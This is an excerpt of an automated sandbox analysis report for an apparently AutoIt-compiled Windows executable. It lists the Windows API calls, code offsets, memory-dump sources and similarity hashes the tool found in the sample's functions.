                                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 00F03C02
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F03C17
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00F03C78
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F03CA4
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F03CC1
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F03D05
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F03D26
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                      • Opcode ID: 9086e4955c231659da9c3196717016d01c2c49df5f195c86b2c2e72ca5dcea4d
                                                                                                                                                                                                                                                      • Instruction ID: a23be0fa524773b35a3a2c81d498c2b67e98481539d5dffcb6e25f5828b19ee8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9086e4955c231659da9c3196717016d01c2c49df5f195c86b2c2e72ca5dcea4d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 525107A0A447D93DFB3283348C45BB6BFAD6B06314F0C8489E5D59A8C2D694EE84F760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2945705084-0
                                                                                                                                                                                                                                                      • Opcode ID: 9848e403a11adf3a78c2f5b6ca5b389059e4ad275e83f3671eda0e74e8a83f99
                                                                                                                                                                                                                                                      • Instruction ID: cdaa0cf93f605e50c4923fa33140b8ebd829b474e466080e0c6c91fd81d50c45
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9848e403a11adf3a78c2f5b6ca5b389059e4ad275e83f3671eda0e74e8a83f99
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94418E66C10359B6CB10EBF5C8469CFB3ECAF04310F5099A6E608F3261FA74E650C7A5
                                                                                                                                                                                                                                                      APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F23DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F23DCB
• FreeLibrary.KERNEL32(00000000), ref: 00F23E80
  • Part of subcall function 00F23D72: RegCloseKey.ADVAPI32(?), ref: 00F23DE8
  • Part of subcall function 00F23D72: FreeLibrary.KERNEL32(?), ref: 00F23E3A
  • Part of subcall function 00F23D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F23E5D
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00F23E25
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 87a899cca8084ee44e62d95821580262affd81a95179cfb175aa5c9675ef85c9
• Instruction ID: e61bb4b038a0e318bbe94d8e05464c57968a6f2431fed5778cef090f558773f2
• Opcode Fuzzy Hash: 87a899cca8084ee44e62d95821580262affd81a95179cfb175aa5c9675ef85c9
• Instruction Fuzzy Hash: A1311CB5D01119BFDB159F94EC85AFFB7BCEF19310F00016AE912E2150D678AF49ABA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F28FE7
• GetWindowLongW.USER32(0113E5D8,000000F0), ref: 00F2901A
• GetWindowLongW.USER32(0113E5D8,000000F0), ref: 00F2904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F29081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F290AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 00F290BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F290D6
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: c8232e6ed4697a857bf92b5adbf52b06f7b908466eae389a62a8d06d5b37af57
• Instruction ID: b41ccc4d5c808f9211155968c298a9c0693d0a9bf0f1d2e805e8620fa98fd72a
• Opcode Fuzzy Hash: c8232e6ed4697a857bf92b5adbf52b06f7b908466eae389a62a8d06d5b37af57
• Instruction Fuzzy Hash: 2A313D35A04129DFDB20CF68EC85F6437A5FB5A724F150264F9558B2B1CBB1A841EB41
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F008F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F00918
• SysAllocString.OLEAUT32(00000000), ref: 00F0091B
• SysAllocString.OLEAUT32(?), ref: 00F00939
• SysFreeString.OLEAUT32(?), ref: 00F00942
• StringFromGUID2.OLE32(?,?,00000028), ref: 00F00967
• SysAllocString.OLEAUT32(?), ref: 00F00975
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: ce1d618ac82b47de467761dd86e22e035ee0371f975d6b92adf835292525ca6d
• Instruction ID: 81e4073f96f7572e637586cdba495229caf82cef2e63360ddb08194e89371aa4
• Opcode Fuzzy Hash: ce1d618ac82b47de467761dd86e22e035ee0371f975d6b92adf835292525ca6d
• Instruction Fuzzy Hash: 45215676601219AFEB10DF68DC84EAB73ECEF19370B048125FD19DB291DA74EC45A760
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: b25898f11e8cf2d21c85b81e1f139e5e72cad63a5254acc2a70c7e8f50ea81c8
• Instruction ID: 4f32cd989ac8ca9675e38958e2d31f35d7c6e3ea75e8b12f4af559d7466e79f4
• Opcode Fuzzy Hash: b25898f11e8cf2d21c85b81e1f139e5e72cad63a5254acc2a70c7e8f50ea81c8
• Instruction Fuzzy Hash: D7213A3250455167C225EA249C1AF7BB3D8EF65310F64402AF946A71C2E7619982F3B9
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F009CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F009F1
• SysAllocString.OLEAUT32(00000000), ref: 00F009F4
• SysAllocString.OLEAUT32 ref: 00F00A15
• SysFreeString.OLEAUT32 ref: 00F00A1E
• StringFromGUID2.OLE32(?,?,00000028), ref: 00F00A38
• SysAllocString.OLEAUT32(?), ref: 00F00A46
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                      • Opcode ID: adbbf06abb1c0b5aa862d6ddb676140ba7f7d247316d906feae693f7ef545506
                                                                                                                                                                                                                                                      • Instruction ID: 99bfa2aea60df9261ec4b085fe5ded9f1762d34664383a7a19d9df47875a440c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adbbf06abb1c0b5aa862d6ddb676140ba7f7d247316d906feae693f7ef545506
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2215879701204AFDB10DFA8DC89E6A77ECEF59370B448125F909CB2A1DA74EC41A754
APIs
  • Part of subcall function 00EDD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
  • Part of subcall function 00EDD17C: GetStockObject.GDI32(00000011), ref: 00EDD1CE
  • Part of subcall function 00EDD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F2A32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F2A33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F2A345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F2A354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F2A360
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: c101a7a4f741a9591f02542066c3bf91fb54a38abe326c8062222af03f398da0
• Instruction ID: 7ce3ea16560c26d17111f356e147e9913a87cf1e93353d7d8fb47b58c697a064
• Opcode Fuzzy Hash: c101a7a4f741a9591f02542066c3bf91fb54a38abe326c8062222af03f398da0
• Instruction Fuzzy Hash: 1F1181B1550129BEEB119FA4DC85EE77F6DFF09798F014115BA08A60A0C7729C21EBA4
APIs
• GetClientRect.USER32(?,?), ref: 00EDCCF6
• GetWindowRect.USER32(?,?), ref: 00EDCD37
• ScreenToClient.USER32(?,?), ref: 00EDCD5F
• GetClientRect.USER32(?,?), ref: 00EDCE8C
• GetWindowRect.USER32(?,?), ref: 00EDCEA5
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: a40a5d981d18ed3a01f366cd3ccda619b025427c58b2e05411dcbc45f12984a5
• Instruction ID: 0ab6bf12b0c02c3e333ce12e301483f5784ff61a2b7656cbaf14ba733c4e15b7
• Opcode Fuzzy Hash: a40a5d981d18ed3a01f366cd3ccda619b025427c58b2e05411dcbc45f12984a5
• Instruction Fuzzy Hash: B6B159B990024ADBDF14CFA8C5807EDBBB1FF08354F24912AEC59AB350DB30A951DB64
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F21C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00F21C26
• __wsplitpath.LIBCMT ref: 00F21C54
  • Part of subcall function 00EE1DFC: __wsplitpath_helper.LIBCMT ref: 00EE1E3C
• _wcscat.LIBCMT ref: 00F21C69
• Process32NextW.KERNEL32(00000000,?), ref: 00F21CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F21CF1
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 1380811348-0
• Opcode ID: 69f92436a826c49d52bd5b33f8aae2de30a85d52765987b7f8d7fae57be3db24
• Instruction ID: c79c7dfc20ea1405637ec1bafafbe28347ff26717320a662cf776a6a785f6429
• Opcode Fuzzy Hash: 69f92436a826c49d52bd5b33f8aae2de30a85d52765987b7f8d7fae57be3db24
• Instruction Fuzzy Hash: 26518D71504344AFD320EF64D885EABB7E8EF88754F00491EF989A7251EB30AA05CB92
APIs
  • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F230AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F230EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F23112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F2313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F2317E
• RegCloseKey.ADVAPI32(00000000), ref: 00F2318B
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3451389628-0
                                                                                                                                                                                                                                                      • Opcode ID: 23294c45e8f67a86016e44594e8b8a681bb0483c8bff90b4d0ddb0c7478cd44a
                                                                                                                                                                                                                                                      • Instruction ID: c6be9318c004d1f7dd44e4fca4c522d98e371b2759eb5c23b41638a40ccac7db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23294c45e8f67a86016e44594e8b8a681bb0483c8bff90b4d0ddb0c7478cd44a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB518871608300AFC700EF68CD81E6ABBE9FF89310F04491DF545972A1DB36EA06EB52
APIs
• GetMenu.USER32(?), ref: 00F28540
• GetMenuItemCount.USER32(00000000), ref: 00F28577
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F2859F
• GetMenuItemID.USER32(?,?), ref: 00F2860E
• GetSubMenu.USER32(?,?), ref: 00F2861C
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00F2866D
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: c99ad698be0e2c0e8746d4fb7be961fbdd53b6ad8915908e7167d3360ed91743
• Instruction ID: f5bcebc055c70f8f374bb51386fff76a723c4f9a3ea16f36bdd78ce2135c5944
• Opcode Fuzzy Hash: c99ad698be0e2c0e8746d4fb7be961fbdd53b6ad8915908e7167d3360ed91743
• Instruction Fuzzy Hash: B851E375E01229AFCF11EF54C941AAEBBF4FF48360F144059E905B7391CB74AE429B90
APIs
• _memset.LIBCMT ref: 00F04B10
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F04B5B
• IsMenu.USER32(00000000), ref: 00F04B7B
• CreatePopupMenu.USER32 ref: 00F04BAF
• GetMenuItemCount.USER32(000000FF), ref: 00F04C0D
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F04C3E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 8d0194d100e687e1da6e76a613c8d5a70b4c3658b011401d94d01fb0a21b77f4
• Instruction ID: a5b450e6724fb5d643ac3e702049953b7a29756ed10fa09b940d38c7ad3b0118
• Opcode Fuzzy Hash: 8d0194d100e687e1da6e76a613c8d5a70b4c3658b011401d94d01fb0a21b77f4
• Instruction Fuzzy Hash: DE51C4F0A01209EFDF20CF64C984BADBBF4AF55328F148159E625972D1D770A944FB51
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00F18E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00F18E89
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00F18EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00F18EC5
• _strlen.LIBCMT ref: 00F18EF7
• WSAGetLastError.WSOCK32(00000000), ref: 00F18F6A
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorLast$_strlenselect
• String ID:
• API String ID: 2217125717-0
• Opcode ID: 4a817653d0d9d6cdcc329df55678e404a3b195652f9c46d32747f4d1e8832274
• Instruction ID: ad16d87d03960e2a186a98872df8a4c499fd13192b633b237932af1e9d1af7d9
• Opcode Fuzzy Hash: 4a817653d0d9d6cdcc329df55678e404a3b195652f9c46d32747f4d1e8832274
• Instruction Fuzzy Hash: A441C371900208AFCB14EBA4CE95FEEB7B9AF58350F104659F51AA72D1DF309E42DB60
APIs
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• BeginPaint.USER32(?,?,?), ref: 00EDAC2A
• GetWindowRect.USER32(?,?), ref: 00EDAC8E
• ScreenToClient.USER32(?,?), ref: 00EDACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EDACBC
• EndPaint.USER32(?,?,?,?,?), ref: 00EDAD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F3E673
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2592858361-0
                                                                                                                                                                                                                                                      • Opcode ID: f39aba53ca13bede0469ea11052c0fe1bff5a953dc9162e46e732f50c1864231
                                                                                                                                                                                                                                                      • Instruction ID: c1a3654484b7d0d1a738631bb6535f48cb9baad034305acb62c073b40c4fde52
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f39aba53ca13bede0469ea11052c0fe1bff5a953dc9162e46e732f50c1864231
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0441AE705042049FC710DF24DC84FBA7BE8FF69334F18066AF9A4962A1D7319946EB62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00F81628,00000000,00F81628,00000000,00000000,00F81628,?,00F3DC5D,00000000,?,00000000,00000000,00000000,?,00F3DAD1,00000004), ref: 00F2E40B
                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00F2E42F
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00F81628,00000000), ref: 00F2E48F
